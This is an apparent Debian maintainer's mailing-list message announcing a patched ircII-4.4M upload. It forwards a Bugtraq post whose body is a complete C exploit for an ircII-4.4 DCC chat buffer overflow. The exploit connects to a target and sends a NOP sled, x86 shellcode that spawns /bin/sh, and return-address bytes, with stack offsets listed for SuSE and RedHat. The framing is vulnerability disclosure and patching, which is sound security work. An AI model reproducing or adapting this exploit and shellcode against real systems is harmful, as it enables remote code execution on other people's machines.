[bladi@EUSKALNET.NET: Fwd: ircii-4.4 buffer overflow]

[Bernd Eckenfels]

I uploaded  ircII-4.4M to incoming on master for frozen and unstable. This
should fix the mentioned bug, also I cant find a note about it in the
upstreams changelog file.

Greetings
Bernd

----- Forwarded message from bladi <[EMAIL PROTECTED]> -----

Envelope-to: [EMAIL PROTECTED]
Delivery-date: Sun, 12 Mar 2000 02:59:36 +0100
Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
X-No-Archive: yes
Delivered-To: mailing list [EMAIL PROTECTED]
Approved-By: [EMAIL PROTECTED]
Delivered-To: [EMAIL PROTECTED]
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
Reply-To: bladi <[EMAIL PROTECTED]>
From:   bladi <[EMAIL PROTECTED]>
Subject:      Fwd: ircii-4.4 buffer overflow
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To:     BUGTRAQ@SECURITYFOCUS.COM

/*

  ircii-4.4 exploit by bladi & aLmUDeNa

  buffer overflow in ircii dcc chat's
  allow to excute arbitrary

  Affected:
           ircII-4.4

  Patch:
         Upgrade to ircII-4.4M
  ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz

  Offset:
         SuSe 6.x :0xbfffe3ff
         RedHat   :0xbfffe888

  Thanks to : #warinhell,#hacker_novatos
  Special thanks go to: Topo[lb],
        Saludos para todos los que nos conozcan especialmente para eva ;)
                                         ([EMAIL PROTECTED])
*/

#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

char *h_to_ip(char *hostname);
char *h_to_ip(char *hostname) {
  struct hostent *hozt;
  struct sockaddr_in tmp;
  struct in_addr in;
  if ((hozt=gethostbyname(hostname))==NULL)
      {
      printf(" ERROR: IP incorrecta\n");
      exit(0);
      }
  memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
  memcpy(&in,&tmp.sin_addr.s_addr,4);
  return(inet_ntoa(in));
}
main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  char *hostname;
  char nops[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  char *shell =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
  int outsocket,tnt,i;
printf (" irciismash  ver: 1.0\n");
printf ("         by         \n");
printf ("  bladi & aLmUDeNa\n\n");

if (argc<3)
    {
    printf("Usage : %s hostname port\n",argv[0]);
    exit(-1);
    }
hostname=argv[1];
outsocket=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_port=htons(atoi(argv[2]));
sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
printf(" ERROR: El puerto esta cerradito :_(\n");
exit(0);
}
    printf("[1]- Noping\n    [");
    for(i=0;i<47;i++)
        {
        if (!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
        write(outsocket,nops,strlen(nops));
        }
    printf("]\n");
    printf("     Noped\n");
    printf("[2]- Injectin shellcode\n");
    write(outsocket,shell,strlen(shell));
    usleep(999);
    printf("     Injected\n");
    printf("[3]- Waiting\n [");
    for(i=0;i<299;i++)
        {
        printf(".");
        fflush(stdout);
        usleep(99);
        write(outsocket,"\xff",strlen("\xff"));
        write(outsocket,"\xbf",strlen("\xff"));
        write(outsocket,"\xff",strlen("\xe9"));
        write(outsocket,"\xe3",strlen("\xff"));
        }
printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
close(outsocket);
}



----- End forwarded message -----

-- 
  (OO)      -- [EMAIL PROTECTED] --
 ( .. )  [EMAIL PROTECTED],linux.de,debian.org} http://home.pages.de/~eckes/
  o--o     *plush*  2048/93600EFD  [EMAIL PROTECTED]  +497257930613  BE5-RIPE
(O____O)  When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!